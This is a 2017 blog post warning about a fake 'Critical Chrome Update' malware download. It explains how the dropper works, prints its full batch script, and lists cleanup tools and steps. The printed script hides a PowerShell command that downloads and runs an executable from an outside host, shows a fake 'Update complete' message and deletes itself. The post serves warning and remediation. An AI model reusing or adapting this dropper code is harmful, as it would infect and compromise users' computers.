Friday, May 12, 2017

How to fix the Critical Chrome Update Virus Malware Attack

The Critical Chrome Update Malware Attack has been going around and getting through many antivirus solutions. Do not click Download now button.



What does this do? A brief analysis

The download now button downloads the following chrome_update.bat file
  1. The script attempts to run using a Powershell command to downloads a file .dat  and renames it into a randomly named .exe file. 
  2. Which then runs this file in the background, and attempts to injection script in current running processes. 
  3. Then you are notified that the "Update Complete" with an OK dissipate button.
  4. By saying click Ok, your installing the install_flash.js  which contains VB script. 
wscript.exe is a Windows service that allows you to execute VBScript files.in this case running install_flash.js

chrome_update.bat contents
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
@echo off
echo a=new ActiveXObject('Wscript.Shell');
a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\16330788701ac441736751e3ee3c6996.exe';
(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);
Start-Process $d;
[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');
[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
>"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0"


Full analysis of this payload chrome_update.bat  at Payload Security.

More information about install_flash.js at Payload Security.


What to do if you did click "Download Now" button? 






      1. Run Bleeping Computer's Rkill . Do not reboot after. 


Then run Malwarebytes Adwcleaner. Reboot (will be asked). 


2. 
Run Bleeping Computer's Rkill, then run Malwarebytes JRT in same session. 



3. Run Malwarebytes
4. Run Hitman Pro
5. Run Windows Defender in Win 8+ or Windows Security Essentials for Win 7 or less.
6. Run free Kaspersky Security Scan get it here
7. Run free Kaspersky Anti-Ransom-ware Tool get it here
8. Run your Anti-Virus Solution in Deep Scan Mode 

9. Clear your Chrome Cache


Open Chrome.
  1. On your browser toolbar, click More More.
  2. Point to More tools, and then click Clear browsing data.
  3. In the "Clear browsing data" box, click the check box only for Cached images and files.
  4. Use the menu at the top to select the amount of data that you want to delete. Choose beginning of time to delete everything.
  5. Click Clear browsing data button
10. Review your cookies in Google Chrome



No comments:

Post a Comment